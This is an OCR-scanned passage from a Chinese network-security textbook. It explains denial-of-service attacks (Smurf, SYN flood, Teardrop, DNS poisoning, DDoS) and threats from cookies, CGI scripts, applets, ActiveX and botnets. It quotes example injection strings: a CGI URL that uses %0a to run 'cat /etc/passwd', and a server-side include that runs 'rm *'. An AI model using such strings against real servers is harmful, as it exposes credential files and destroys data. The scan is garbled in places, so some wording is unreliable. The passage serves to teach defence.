过 响应 它们 ,返回 这 些 包 给 主机 A。 这 一 系列 活动 使 得 网 络 中 包含 主机 A 和 主机 B 部 分 
的 基础 设施 进入 一 种 无 限 循环 状态 。 更 有 甚 者 ,攻击 者 在 发 送 第 一 个 包 的 时 候 , 将 它 的 目 
标 地 址 和 源 地 址 都 设置 成 主机 B 的 地 址 ,这样 ,主机 B 就 会 陷入 一 个 循环 之 中 ,不 断 地 对 
它 自己 发 出 的 消息 做 出 应 答 。 

@ 死亡 之 Ping。 死 亡 之 Ping(Ping of Death) 是 一 种 简单 的 攻击 方式 。 因 为 Ping 要 
求 接收 者 对 Ping 请 求 做 出 响应 , 故 攻击 者 所 要 做 的 事情 就 是 不 断 地 向 攻击 目标 发 送 大 量 
的 Ping, 以 图 淹没 攻击 目标 。 然 而 ,这 种 攻击 要 受 攻击 路 径 上 最 小 带宽 的 限制 。 如 果 攻 
击 者 使 用 的 是 10Mbit/s 带宽 的 连接 ,而 到 攻击 目标 的 路 径 带 宽 为 100Mbit/s 甚至 更 高 ， 
那么 , 单 凭 攻击 者 自身 是 不 足以 淹没 攻击 目标 的 。 但是, 如果 将 这 两 个 数字 对 换 一 下 , 即 
攻击 者 使 用 100Mbit/s 的 连接 ,而 到 攻击 目标 的 路 径 带 宽 为 10Mbit/s, 则 攻击 者 可 以 轻 
易 地 淹没 攻击 目标 。 这 些 Ping 包 将 会 把 攻击 目标 的 带宽 堵塞 得 满 满 当 当 。 

@ Smurf。Smurf 攻击 是 Ping 攻击 的 一 个 变 体 。 它 采用 与 Ping 攻击 方式 相同 的 载 
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体 一 一 Ping 包 , 但 使 用 了 另外 两 种 手法 。 首 先 ,攻击 者 需要 选择 不 知情 的 受害 者 所 在 的 网 
络 。 攻 击 者 假 造 受害 者 的 主机 地 址 作为 Ping 包 中 的 源 地 址 ,以 使 Ping 包 看 起 来 像 是 从 受 


害 者 主机 发 出 来 的 一 样 。 然 后 ,攻击 者 以 广播 模式 (通过 将 目标 地 址 的 最 后 一 个 字 节 全 部 设 
置 为 1) 向 网 络 发 送 该 请 求 , 这 些 广播 包 就 会 发 布 给 网 络 上 的 所 有 主机 ,如 图 7-1 所 示 。 


所 
pe 有 
攻击 者 向 网 络 发 送 广 / 8 第 受害 者 
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一 = 
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受害 者 被 来 自 整 个 网 


络 的 ECHO 响 应 淹没 


直 
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六、 
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图 7-1 Smurf 攻击 


@ 同步 洪 泛 。 同 步 洪 泛 (SYN Flood) 是 另 一 种 流行 的 拒绝 服务 攻击 。 这 种 攻击 利 
用 了 TCP 协议 组 ,使 用 这 些 面 向 会 话 的 协议 来 实施 攻击 。 

对 于 一 个 协议 (比如 Telnet) ,在 协议 的 对 等 层次 之 间 将 建立 一 个 虚拟 连接 , 称 为 一 个 
会 话 (Session) ,以 便 对 Telnet 终端 模仿 自然 语言 中 来 来 回回 .有 问 有 答 的 交互 过 程 进行 
同步 。 Eee 每 一 个 TCP 包 都 有 一 些 标记 位 ,其 中 有 两 个 标记 
位 表示 SYN( 同 步 ) 和 ACK( 应 答 )。 在 开始 一 次 TCP 连接 时 ,连接 发 起 者 发 送 一 个 设置 
了 SYN 标记 的 包 。 A 训 ee 
接 ,就 会 用 一 个 设置 了 SYN 和 ACK 标记 的 包 进行 器 SNACK 三 
应 答 。 然 后 ,第 一 方 发 送 一 个 设置 了 ACK 标记 的 x 
包 给 接收 方 ,这 样 就 完成 了 建立 一 个 清晰 完整 的 通 a 
信和 通道 的 交换 过 程 ,如 图 7-2 所 示 。 

包 在 传输 过 程 中 偶尔 会 出 现 丢 失 或 者 损坏 的 
情况 。 因 此 ,在 接收 端 维 持 着 一 个 称 为 SYN_RECYV 连接 的 队列 ,用 于 跟踪 已 经 发 送 了 
SYN-ACK 信号 但 还 没有 收 到 ACK 信号 的 项 。 在 正常 情况 下 ,这 些 工 作 在 一 段 很 短 的 时 
间 内 就 会 完成 。 但 如 果 SYN-ACK(2) 或 者 ACK(3) 包 丢 失 , 最 终 目 标 主机 会 由 于 这 个 
不 完整 的 连接 超时 而 将 它 从 等 待 队 列 中 丢掉 。 

攻击 者 可 以 通过 发 送 很 多 SYN 请 求 而 不 以 ACK 响应 ,从 而 填 满 对 方 的 SYN_ 
RECYV 队列 来 对 目标 进行 拒绝 服务 攻击 。 通 常 SYN_RECYV 队列 相当 小 ,比如 只 能 容纳 
10 个 或 者 20 个 表 项 。 由 于 在 因特网 中 存在 潜在 的 传输 延迟 ,通常 在 SYN_RECYV 队列 中 
保留 数据 的 时 间 最 多 可 达 几 分 钟 。 因 此 ,攻击 者 只 需要 每 隔 几 秒 钟 发 送 一 个 新 的 SYN 
请 求 , 就 可 以 填 满 该 队列 。 

攻击 者 在 使 用 这 种 方法 的 时 候 , 通 常 还 要 做 一 件 事情 : 在 初始 化 SYN 包 中 使 用 一 个 


目的 


图 7-2 三 次 连接 握手 
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不 存在 的 返回 地 址 来 欺骗 对 方 。 为 什么 ” 有 两 个 原因 。 第 一 ,攻击 者 不 希望 泄露 真实 的 
源 地 址 ,以免 被 通过 检查 SYN_RECYV 队列 中 的 包 而 试图 识别 攻击 者 的 人 认 出 来 。 第 二 ， 
攻击 者 想 要 使 得 这 些 伪造 的 SYN 包 与 用 于 建立 真实 连接 的 合法 SYN 包 没 有 区 别 。 为 
每 个 包 选 择 一 个 不 同 的 ( 骗 人 的 ) 源 地 址 ,以 使 它们 是 唯一 的 。 一 个 SYN-ACK 包 发 往 一 
个 不 存在 的 地 址 会 导致 网 络 发 出 一 个 “目标 不 能 到 达 ” 的 ICMP 报 文 ,但 这 不 是 TCP 所 期 
待 的 ACK 信号 (请 记 住 ,TCP 和 ICMP 是 不 同 的 协议 组 。 因 此 ,一 个 ICMP 应 答 不 需要 
返回 到 发 送 者 的 TCP 处 理 部 分 )。 

@ Teardrop。Teardrop 攻击 滥用 了 设计 来 改善 网 络 通信 的 特性 。 一 个 网 络 1P 数 
据 报 是 一 个 变 长 的 对 象 。 为 了 支持 不 同 的 应 用 和 不 同 的 情况 ,数据 报 协议 允许 将 单个 数 
据 单元 分 片 , 即 分 成 小 段 数 据 , 分 别 发 送 。 每 个 分 片 可 表明 其 长 度 和 在 数据 单元 中 的 相对 
位 置 。 接 收 端 负责 重新 将 分 片 组 装 成 单个 数据 单元 。 

在 Teardrop 攻击 中 ,攻击 者 发 送 一 系列 数据 报 ,这 些 数据 报 不 能 被 正确 组 装 在 一 起 。 
一 个 数据 报表 明 它 的 位 置 在 长 度 为 60 字 节 的 数据 单元 的 位 置 0 处 。 另 一 个 表明 它 在 90 
字 节 的 数据 单元 的 位 置 30 处 ,还 有 一 个 表明 它 在 173 字 节 的 数据 单元 位 置 41 处 。 这 三 
个 分 片 是 重 又 的 ,所 以 ,不 能 正确 重组 。 在 极端 情况 下 ,操作 系统 将 把 不 能 重组 的 数据 单 
元 部 分 锁 住 ,而 导致 拒绝 服务 。 

(3) 流量 重 定向 。 路 由 器 工作 在 网 络 层 ,是 一 种 在 源 主机 所 在 网 络 与 目标 主机 所 在 
网 络 之 间 ,通过 一 些 中 间 网 络 来 向 前 传递 消息 的 设备 。 因 此 ,如 果 攻 击 者 可 以 破坏 寻 址 ， 
就 不 能 正确 传递 消息 。 

路 由 器 使 用 复杂 的 算法 来 决定 如 何 进行 路 径 选 择 。 不 管 采用 何 种 算法 ,从 本 质 上 说 
都 是 为 了 寻找 一 条 最 好 的 路 径 (在 这 里 ,最 好 ?是 通过 一 些 综合 指标 来 进行 衡量 的 ,比如 
距离 .时 间 、 费 用 和 质量 等 )。 每 一 个 路 由 器 只 知道 与 它 共 享 相同 网 络 连接 的 路 由 器 ,路 由 
器 之 间 使 用 网 关 协 议 来 共享 一 些 信息 ,这 些 信 息 是 关于 彼此 之 间 的 通信 能 力 的 。 每 一 个 
路 由 器 都 要 向 它 的 相 邻 路 由 器 通告 它 自己 到 达 其 他 网 络 的 路 径 情况 。 这 个 特点 可 以 被 攻 
击 者 用 来 破坏 网 络 。 

请 牢记 : 说 到 底 , 路 由 器 都 只 是 一 台 带 有 两 块 或 者 更 多 网 卡 的 计算 机 。 假 设 一 台 
由 器 向 它 的 所 有 相 邻 路 由 器 报告 : 它 到 整个 网 络 的 每 一 个 其 他 地 址 都 有 最 好 的 路 径 。 很 
快 ,所 有 路 由 器 都 会 将 所 有 通信 传递 到 该 路 由 器 。 这 样 , 这 人 台 路 由 器 就 会 被 大 量 通信 和 所 流 
没 ,或 者 只 能 将 大 多 数 通信 一 委 了 之 。 无 论 出 现 哪 一 种 情况 ,都 会 造成 大 量 通信 永远 不 能 
到 达 预 期 的 目标 。 

(4) DNS 攻击 。 最 后 一 种 拒绝 服务 攻击 是 一 类 基于 域名 服务 器 (Domain Name 
Server,DNS) 的 攻击 。DNS 是 一 张 表 ,用 于 将 域名 (比如 ATT. COM) 转 换 成 对 应 的 网 络 
地 址 (比如 211. 217. 74. 130) ,这 个 过 程 称 为 域名 解析 。 域 名 服务 器 在 遇 到 它 不 知道 的 域 
名 时 ,通过 向 其 他 域名 服务 器 提出 询问 来 进行 解析 。 出 于 效率 的 考虑 , 它 会 将 收 到 的 答案 
存储 起 来 ,以 便 将 来 再 解析 该 域名 的 时 候 能 够 更 快 一 些 。 

在 绝 大 多 数 采用 UNIX 实现 域名 服务 的 系统 中 ,域名 服务 器 运行 的 软件 称 为 BIND 
(Berkeley Internet Name Domain) 或 者 Named(Name Daemon 的 简写 ) 。 在 BIND 中 存 
在 着 大 量 缺 陷 , 包 括 现在 大 家 熟悉 的 缓冲 区 溢出 缺陷 。 
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通过 接管 一 个 域名 服务 器 或 者 使 其 存储 一 些 伪造 的 表 项 ( 称 为 DNS 缓存 中 毒 ) ,攻击 
者 可 以 对 任何 通信 进行 重 定向 ,这 种 方式 带 有 明显 拒绝 服务 的 含义 。 

2002 年 10 月 ,大 量 洪 泛 流量 淹没 了 顶级 域名 DNS 服务 器 ,这 些 服务 器 构成 了 因 特 
网 寻 址 的 基石 。 大 约 一 半 的 流量 仅 来 自 200 个 地 址 。 虽 然 人 们 认为 这 些 问题 是 防火 墙 的 
误 配 置 ,但 没有 人 确 知 是 什么 引起 了 攻击 。 

2005 年 3 月 ,一 次 攻击 利用 了 Symantec 防火 墙 的 漏洞 ,该 漏洞 是 允许 修改 Windows 
机 器 中 的 DNS 记录 。 但 这 次 攻击 的 对 象 不 是 拒绝 服务 。 在 这 次 攻击 中 ,“ 中 招 ” 的 DNS 
缓存 重 定向 用 户 到 广告 网 站 ,这 些 广告 网 站 在 每 次 用 户 访问 网 站 时 进行 收费 。 同 时 ,这 次 
攻击 也 阻止 用 户 访问 合法 网 站 。 

4) 分 布 式 拒绝 服务 

上 面 所 列举 的 拒绝 服务 攻击 本 身 就 已 经 非常 具有 威力 了 ,但 是 ,攻击 者 还 可 以 采取 一 
种 两 阶段 的 攻击 方式 ,攻击 效果 可 以 扩大 很 多 倍 。 这 种 乘 数 效应 为 分 布 式 拒绝 服务 攻击 
提供 了 巨大 威力 。 攻 击 者 发 起 DDoS 攻击 的 第 一 步 是 在 Internet 上 寻找 有 漏洞 的 主机 并 
试图 侵入 ,入 侵 成 功 后 在 其 中 安装 后 门 或 者 木马 程序 ;第 二 步 是 在 入 侵 各 主机 上 安装 攻击 
程序 ,由 程序 功能 确定 其 扮演 的 不 同 角色 ;最 后 由 各 部 分 主机 各 司 其 职 ,在 攻击 者 的 调 遗 
下 对 目标 主机 发 起 攻击 ,制造 数 以 百 万 计 的 数据 分 组 流入 和 欲 攻击 的 目标 ,致使 目标 主机 或 
网 络 极度 拥塞 ,从 而 造成 目标 系统 的 瘫痪 。 

与 DoS 一 次 只 能 运行 一 种 攻击 方式 攻击 一 个 目标 不 同 , DDoS 可 以 同时 运用 多 种 
DoS 攻击 方式 ,也 可 以 同时 攻击 多 个 目标 。 攻 击 者 利用 成 百 上 千 个 被 “控制 ? 结 点 向 受害 
结 点 发 动 大 规模 的 协同 攻击 。 通 过 消耗 带宽 .CPU 和 内 存 等 资源 ,造成 被 攻击 者 性 能 下 
降 ,其 至 瘫痪 和 死机 ,从 而 造成 合法 用 户 无 法 正常 访问 。 与 DoS 相 比 ,其 破坏 性 和 危害 程 
度 更 大 ,涉及 范围 更 广 , 更 难 发 现 攻 击 者 。DDoS 的 攻击 原理 如 图 7-3 所 示 。 


攻击 者 
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图 7-3 ”分布 式 拒绝 服务 攻击 原理 图 
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(1) 攻击 者 。 攻 击 者 可 以 是 网 络 上 的 任何 一 台 主 机 。 在 整个 攻击 过 程 中 , 它 是 攻击 
主 控 台 ,向 主 控 机 发 送 攻击 命令 ,包括 被 攻击 者 主机 地 址 ,控制 整个 攻击 过 程 。 攻 击 者 与 
主 控 机 的 通信 一 般 不 包括 在 DDoS 工具 中 ,可 以 通过 多 种 连接 方法 完成 ,最 常用 的 有 
Telnet TCP 终端 会 话 , 还 可 以 是 绑 定 到 TCP 端口 的 远程 Shell, 基 于 UDP 的 客户 /服务 
器 远程 Shell 等 。 

(2) 主 控 机 。 主 控 机 和 代理 主机 都 是 攻击 者 非法 侵入 并 控制 的 一 些 主机 ,它们 分 成 
了 两 个 层次 ,分 别 运行 非法 植 人 的 不 同 的 攻击 程序 。 每 个 主 控 机 控制 一 部 分 代理 主机 , 主 
控 机 有 其 控制 的 代理 主机 的 地 址 列表 , 它 监听 端口 接收 攻击 者 发 来 的 命令 后 ,将 命令 转发 
给 代理 主机 。 主 控 机 与 代理 主机 的 通信 根据 DDoS 工具 的 不 同 而 有 所 不 同 。 如 Trinoo 
使 用 UDP 协议 ,TFN 使 用 ICMP 协议 ,Stacheldraht 使 用 TCP 和 ICMP 协议 。 

(3) 代理 主机 。 代 理 主 机 运行 攻击 程序 ,监听 端口 接收 和 运行 主 控 机 发 来 的 命令 ,是 
真正 进行 攻击 的 机 器 。 

(4) 被 攻击 者 。 被 攻击 者 可 以 是 路 由 器 、 交 换 机 、 主 机 。 遭 受 攻击 时 ,它们 的 资源 或 
带宽 被 耗 尽 。 防 火 墙 、. 路 由 器 的 阻塞 还 可 能 导致 恶性 循环 ,加 重 网 络 拥塞 情况 。 

除了 巨大 的 乘 数 效应 以 外 ,也 很 容易 通过 脚本 来 实施 分 布 式 拒绝 服务 攻击 ,这 也 是 一 
个 严重 的 问题 。 只 要 给 出 了 一 套 拒 绝 服务 攻击 方式 和 一 种 特洛伊 木马 繁殖 方式 ,人 们 就 
可 以 很 容易 地 写 出 一 个 程序 来 植 入 特洛伊 木马 ,该 特洛伊 木马 就 可 以 用 任何 一 种 或 者 所 
有 的 拒绝 服务 攻击 方法 实施 攻击 。DDoS 攻击 工具 最 早出 现 于 1999 年 中 期 ,包括 TFN 
(Tribal Flood Network), Trin00 以 及 TFN2K (Tribal Flood Network, Year 2000 
Edition)。 随 着 一 些 新 弱点 的 发 现 ,特洛伊 木马 的 植 入 方式 也 随 之 发 生 了 一 些 改变 ,而 
且 , 随 着 一 些 新 的 拒绝 服务 攻击 方式 被 发 现 ,也 相应 出 现 了 一 些 新 的 组 合 工 具 。 

5) 来 自 活动 或 者 移动 代码 的 威胁 

活动 代码 (Active Code) 或 者 移动 代码 (Mobile Code) 是 对 被 “ 推 人 ”到 客户 端 执行 的 
代码 的 统称 。 网 页 服务 器 为 什么 要 浪费 宝贵 的 资源 和 带宽 去 做 那些 客户 工作 站 能 做 的 简 
单 工 作 呢 ?例如 ,假设 想 让 你 的 网 站 上 出 现 一 些 熊 跳 着 舞 跨 过 页 面 顶部 的 画面 。 为 了 下 
载 这 些 正在 跳舞 的 能 ,你 可 能 会 在 这 些 熊 每 一 次 运动 的 时 候 下 载 一 幅 新 图 片 : 向 前 移动 
一 点 ,再 向 前 移动 一 点 ,如 此 继续 下 去 。 然 而 ,这 种 方法 占用 了 服务 器 太 多 的 时 间 和 带宽 ， 
因为 需要 服务 器 来 计算 这 些 熊 的 位 置 并 下 载 很 多 新 的 图 片 。 一 种 更 有 效 利用 (服务 器 ) 资 
源 的 方式 是 直接 下 载 一 个 实现 能 运动 的 程序 ,让 它 在 客户 计算 机 上 运行 即 可 。 

本 节 将 介绍 不 同 种 类 活动 代码 的 相关 潜在 弱点 。 

(1) Cookie。 严 格 说 来 ,Cookie 不 是 活动 代码 ,而 是 一 些 数据 文件 ,远程 服务 器 能 够 
存 人 或 获取 Cookie。 然 而 ,由 于 Cookie 的 使 用 可 能 造成 从 一 个 客户 到 服务 器 的 不 期 望 的 
数据 传送 ,所 以 它 的 一 个 缺点 就 是 失去 了 机 密 性 。 

Cookie 是 一 个 数据 对 象 ,可 以 存放 在 内 存 中 (一 次 会 话 Cookie) ,也 可 以 为 将 来 使 用 
而 存储 在 磁盘 上 (持久 Cookie) 。Cookie 可 以 存储 浏览 器 允许 的 与 客户 相关 的 任何 内 容 : 
用 户 按键 、 机 器 名 称 .连接 详细 内 容 ( 比 如 IP 地 址 ) .日 期 和 类 型 等 。 在 服务 器 命令 控制 
下 ,浏览 器 将 Cookie 的 内 容 发 送 给 服务 器 。 一 次 会 话 Cookie 在 关闭 浏览 器 的 时 候 被 删 
除 ,而 持久 Cookie 却 可 以 保留 一 段 预先 设 定 的 日 期 ,可 能 是 未 来 的 几 年 时 间 。 
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Cookie 为 服务 器 提供 了 一 个 上 下 文 。 通 过 使 用 Cookie, 某 些 主页 可 以 使 用 “欢迎 回 
来 ,James Bond” 这 样 的 欢迎 词 来 对 你 表示 欢迎 ,或 者 反映 出 你 的 一 些 选择 ,比如 “我 们 将 
把 该 订单 上 的 货物 邮寄 到 Elm 大 街 135 号 ,对 吗 ?” 但 是 ,正如 以 上 两 个 例子 所 显示 出 来 
的 那样 ,任何 人 只 要 拥有 了 某 人 的 Cookie, 他 在 某 些 情 形 中 就 代表 着 这 个 人 。 这 样 ,任何 
人 只 要 窃听 或 者 获得 了 一 个 Cookie, 就 可 以 冒充 该 Cookie 的 所 有 者 。 

Cookie 中 究竟 包含 着 关于 你 的 哪些 信息 呢 ? 尽管 这 些 都 是 你 的 信息 ,但 绝 大 多 数 时 
间 你 都 不 会 知道 Cookie 里 边 到 底 是 些 什么 东西 ,因为 Cookie 的 内 容 是 使 用 一 个 来 自 服 
务 器 的 密 钥 加 过 密 的 。 

因此 ,Cookie 会 占用 你 的 磁盘 空间 .保存 着 一 些 你 不 能 看 到 但 与 你 相关 的 信息 ,能 传 
递 给 服务 器 但 你 不 知道 服务 器 什么 时 候 想 要 它 ,服务 器 也 不 会 通知 你 。 

(2) 脚本 。 客 户 可 以 通过 执行 服务 器 上 的 脚本 来 请 求 服务 。 通 常情 况 是 ,网 页 浏览 
器 显示 一 个 页 面 , 当 用 户 通过 浏览 器 与 网 站 进行 交互 时 ,浏览 器 把 用 户 输入 的 内 容 转化 成 
一 个 预先 定义 好 的 脚本 中 需要 的 参数 ;然后 , 它 发 送 这 个 脚本 和 参数 给 服务 器 执行 。 但 
是 ,所 有 通信 都 是 通过 HTML 来 进行 的 ,服务 器 不 能 区 分 这 些 命令 到 底 是 来 自 一 个 浏览 
器 上 的 用 户 完成 一 个 主页 后 提交 的 ,还 是 一 个 用 户 用 手工 写 出 来 的 。 一 些 怀 有 恶意 的 用 
户 可 能 会 监视 一 个 浏览 器 与 服务 器 之 间 的 通信 ,观察 怎样 改变 一 个 网 页 条 目 可 以 影响 浏 
览 器 发 送 的 内 容 , 及 其 后 服务 器 会 做 出 何 种 反应 。 具 备 了 这 些 知 识 , 怀 有 恶意 的 用 户 就 可 
以 操纵 服务 器 的 活动 了 。 

来 看 看 这 种 操纵 活动 有 多 么 容易 。 首 先 ,要 记 住 程序 员 们 通常 不 能 预见 到 恶意 的 举 
动 ; 事 实 正好 相反 ,程序 员 们 认为 用 户 都 是 合法 的 ,会 按照 程序 预先 设 定 的 操作 规程 来 使 
用 一 个 程序 。 正 是 由 于 这 个 原因 ,程序 员 们 常常 忽略 过 滤 脚本 参数 ,以 保证 用 户 的 操作 是 
合理 的 ,而 且 执行 起 来 也 是 安全 的 。 一 些 脚 本 允许 包含 到 任何 文件 中 ,或 者 允许 执行 任何 
命令 。 攻 击 者 可 以 在 一 个 字符 串 中 看 到 这 些 文件 或 命令 ,并 通过 改变 它们 来 做 一 些 实验 。 

一 种 大 家 都 很 熟悉 的 针对 网 页 服务 器 的 攻击 方式 是 Escape 字符 (Escape-Character) 
攻击 。 一 种 常用 于 网 页 服务 器 的 脚本 语言 一 一 公共 网 关 接 口 (Common Gateway 
Interface,CGD 一 一 定义 了 一 种 不 依赖 于 具体 机 器 的 方法 来 对 通信 数据 编码 。 按 照 编码 
惯例 ,使 用 %nn 来 代表 特殊 的 ASCII 字符 。 例 如 ,%0A( 行 结束 ) 指 示 解 释 器 将 紧 接着 的 
一 些 字符 当 作 一 个 新 的 命令 。 下 面 的 命令 是 请 求 复制 服务 器 的 口令 文件 : 


http:/www.test.caycgi- bin/query2%0a/bin/cat%20/etc/passwd 


CGI 脚本 也 可 以 直接 在 服务 器 上 启动 一 个 动作 。 例 如 ,如 果 攻 击 者 观察 到 一 个 CGI 
脚本 中 包含 着 如 下 格式 的 一 个 字符 串 : 


<!--#action arg value arg- value - -> 
攻击 者 用 以 下 字符 串 替代 上 述 字 符 串 后 ,就 提交 一 个 命令 : 
<!——#exec a "rm * "一 > 


这 就 会 引起 命令 行 解释 器 执行 一 个 命令 删除 当前 目录 下 的 所 有 文件 。 
微软 的 动态 服务 器 页 面 (Active Server Page, ASP) 也 具有 像 脚 本 一 样 的 能 力 。 这 些 
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页 面 指导 浏览 器 怎样 显示 文件 .维护 上 下 文 以 及 与 服务 器 交互 。 它 们 在 浏览 器 端 也 可 以 
被 看 到 ,所 以 任何 存在 于 ASP 代码 中 的 编程 漏洞 都 可 用 于 侦察 和 攻击 。 

服务 器 永远 不 要 相信 来 自 客户 端的 任何 东西 ,因为 远程 用 户 可 以 向 服务 器 发 送 手 工 
写 出 来 的 字符 串 ,用 以 代替 由 服务 器 发 送 给 客户 端的 善意 的 程序 。 正 是 由 于 有 如 此 多 的 
远程 访问 方式 ,所 有 这 些 例子 证 明了 这 样 一 点 : 如 果 你 允许 其 他 人 在 你 的 机 器 上 运行 程 
序 , 那 你 的 机 器 就 不 会 有 绝对 的 安全 保障 。 

(3) 活动 代码 。 通 过 以 下 几 个 步骤 就 可 以 开始 显示 主页 : 产生 文本 ,插入 图 片 , 并 通 
过 鼠标 点 击 来 获取 新 页 。 很 快 , 人 们 就 在 他 们 的 站 点 上 使 用 了 一 些 精心 设计 的 内 容 : 咒 
呐 学 步 的 孩子 在 页 面 上 跳舞 三 维 旋 转 的 立方 .图 片 时 隐 时 现 、 颜 色 不 断 改 变 ,以 及 显示 总 
数 等。 其 中 ,特别 是 涉及 运动 的 小 技巧 显然 会 占用 重要 的 计算 能 力 , 还 需要 花 大 量 时 间 和 
通信 从 服务 器 上 把 它们 下 载 到 客户 端 。 然 而 ,通常 情况 下 ,客户 自身 有 一 个 有 能 力 却 没有 
充分 利用 的 处 理 器 ,因此 ,无 须 担心 活动 代码 占用 客户 端 计算 时 间 的 问题 。 

为 了 充分 利用 处 理 器 的 能 力 ,服务 器 可 以 下 载 一 些 代码 到 客户 端 去 执行 。 这 些 可 执 
行 代码 称 为 活动 代码 (Active Code)。 两 种 主要 的 活动 代码 是 Java 代码 (Java Code) 和 
Activex 控件 (Activex Control) 。 

@ Java 代码 。 恶 意 的 Applet(Hostile Applet) 是 一 种 可 以 下 载 的 Java 代码 ,会 对 客 
户 系 统 造 成 损害 。 由 于 Applet 在 下 载 以 后 失去 了 安全 保护 ,而 且 通 常 以 调用 它 的 用 户 的 
权限 运行 ,因此 恶意 的 Applet 会 造成 严重 破坏 。Dean 等 列举 了 安全 执行 Applet 的 几 种 
必要 条 件 : 
系统 必须 控制 Applet 对 重要 系统 资源 的 访问 ,比如 文件 系统 、 处 理 器 网络、 用 户 
显示 和 内 部 状态 变量 等 。 
编程 语言 必须 通过 阻止 伪造 内 存 指针 和 数组 (缓冲 区 ) 溢 出 来 保护 内 存 。 

在 创建 新 对 象 的 时 候 ,系统 必须 通过 清除 内 存 内 容 来 阻止 对 象 的 重用 ;在 不 再 使 
用 某 些 变量 的 时 候 ,系统 应 该 使 用 垃圾 回收 机 制 来 收回 所 占用 的 内 存 。 

系统 必须 控制 Applet 之 间 的 通信 ,以 及 控制 Applet 通过 系统 调用 对 Java 系统 外 
的 环境 产生 的 影响 。 

@ Activex 控件 。 微软 公 司 针对 Java 技术 的 应 对 措施 是 ActiveX 系列 。 使 用 
ActiveX 控件 以 后 ,任何 类 型 的 对 象 都 可 以 下 载 到 客户 端 。 如 果 该 客户 有 一 个 针对 这 种 
对 象 类 型 的 阅读 器 或 者 处 理 程 序 ,就 可 以 调用 该 阅读 器 来 显示 这 个 对 象 。 例 如 ,下 载 一 个 
Word 的 . doc 文件 就 会 调用 系统 上 安装 的 Word 程序 来 显示 该 文件 。 对 于 那些 客户 端 没 
有 相应 处 理 程序 的 文件 将 会 导致 下 载 更 多 的 其 他 代码 。 正 是 由 于 这 个 特点 ,从 理论 上 来 
说 ,攻击 者 可 以 发 明 一 种 新 的 文件 类 型 ,比如 称 之 为 . bomb 的 类 型 ,就 会 导致 那些 毫 无 戒 
心 的 用 户 在 下 载 一 个 包含 . bomb 文件 的 主页 时 ,也 随同 下 载 了 可 以 执行 . bomb 类 型 文件 
的 代码 。 

为 了 阻止 任意 下 载 文 件 ,微软 公司 使 用 了 一 种 鉴别 方案 ,在 这 种 鉴别 方案 下 ,下 载 的 
代码 是 有 密码 标记 的 ,而 且 在 执行 之 前 需要 验证 签名 。 但 是 ,鉴别 验证 的 仅仅 是 源 代码 ， 
而 不 是 它们 的 正确 性 或 者 安全 性 。 来 自 微软 公司 (Netscape 或 者 任何 其 他 生产 商 ) 的 代 
码 并 不 是 绝对 安全 的 ,具有 未 知 来 源 的 代码 可 能 会 更 安全 ,但 也 可 能 更 不 安全 。 以 前 的 事 
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实证 明 : 不 论 代码 来 自 何 处 ,你 都 不 能 假设 它 到 底 有 多 好 或 者 有 多 安全 。 况 且 , 有 些 弱 点 
还 可 以 允许 ActiveX 绕 过 这 种 鉴别 。 

(4) 根据 类 型 自动 执行 。 数 据 文件 是 通过 程序 进行 处 理 的 。 对 于 某 些 产品 而 言 , 文 
件 类 型 是 通过 文件 的 扩展 名 来 表示 的 ,比如 扩展 名 为 . doc 的 文件 是 一 个 Word 文档 , 扩 
展 名 为 . pdf 可 移植 文档 格式 (Portable Document Format) 的 文件 是 一 个 Adobe Acrobat 
文件 ,而 以 . exe 为 扩展 名 的 文件 是 一 个 可 执行 文件 。 在 许多 系统 中 , 当 一 个 具有 某 种 扩 
展 名 的 文件 到 达 时 ,操作 系统 会 自动 调用 相应 的 处 理 程序 来 处 理 它 。 

把 一 个 Word 文档 本 身 当 作 一 个 可 执行 文件 是 让 人 难以 理解 的 。 为 了 阻止 人 们 通过 
输入 名 字 作 为 命令 来 运行 文件 Temp. doc, 微 软 公司 在 文件 中 内 置 了 它 的 真实 类 型 。 只 
需要 在 Windows 文件 浏览 器 窗口 中 双击 该 文件 ,就 可 以 激活 相应 的 程序 来 处 理 这 个 
文件 。 

但 是 ,这 种 方案 也 为 攻击 者 提供 了 一 个 机 会 。 一 名 怀 有 恶意 的 代理 可 能 会 给 你 发 送 
一 个 名 为 innocuous. doc 的 文件 ,使 你 以 为 它 是 一 个 Word 文档 。 由 于 它 的 扩展 名 是 
. doc, 因 此 Word 会 试图 打开 它 。 假 设 该 文件 被 重 命名 为 innocuous (没有 扩展 名 . doc)， 
但 如 果 内 置 的 文件 类 型 是 . doc, 那 么 双击 innocuous 也 会 激活 Word 程序 打开 该 文件 。 这 
个 文件 中 可 能 包含 着 一 些 不 怀 好 意 的 宏 命 令 ,或 者 通过 请 求 打开 另 一 个 更 危险 的 文件 。 

在 通常 情况 下 ,可 执行 文件 是 危险 的 ,而 文本 文件 相对 比较 安全 ,一 些 带 有 活动 内 容 
的 文件 (比如 . doc 文件 ) 介 平 两 者 之 间 。 如 果 一 个 文件 没有 明显 的 文件 类 型 ,将 会 使 用 它 
内 置 的 文件 处 理 程序 来 打开 ,此 时 , 正 步 人 危险 的 境地 。 攻 击 者 常常 使 用 没有 明显 文件 类 
型 的 方法 来 隐藏 一 个 怀 有 恶意 的 活动 文件 。 

(5) 蠕虫 (Bot)。 蠕 虫 (Bot) 是 黑客 机 器 人 ,是 在 远程 控制 的 一 段 有 恶意 的 代码 。 这 
些 目标 代码 是 分 布 在 大 量 受害 者 主机 的 特洛伊 木马 。 如 果 忽 略 它们 消耗 计算 机 资源 和 网 
络 资源 ,由 于 不 干扰 或 损害 用 户 的 计算 机 ,因而 通常 不 易 被 察觉 。 

通过 常用 的 网 络 , 如 在 线 聊 天 系统 (Internet Relay Chat,IRC) 通 道 、.P2P 网 络 ( 该 网 
络 通过 Internet 共享 音乐 ) ,蠕虫 之 间或 蠕虫 与 主 控 机 之 间 进 行 相互 协作 。 由 蠕虫 构成 的 
网 络 称 为 Botnet, 其 结构 类 似 松散 协作 的 Web 站 点 ,该 结构 允许 任何 一 个 蠕虫 或 蠕虫 组 
失效 ,并 存在 多 个 连接 通道 用 于 信息 与 协调 工作 ,因此 ,灵活 性 非常 好 。 

Botnet 常用 于 分 布 式 拒绝 服务 攻击 ,从 很 多 站 点 发 起 对 受害 者 的 并 行 攻 击 。 它 们 也 
常常 用 于 垃圾 邮件 或 其 他 大 邮件 攻击 ,发 送 服务 提供 者 发 送 极 大 邮件 可 能 引起 网 络 堵塞 。 

3. 对 网 络 中 信息 的 威胁 

1) 传输 中 的 威胁 : 偷 听 与 窃听 

实施 攻击 的 最 简便 方法 就 是 偷 听 (Eavesdrop)。 攻 击 者 无 须 额外 努力 就 可 以 毫 无阻 
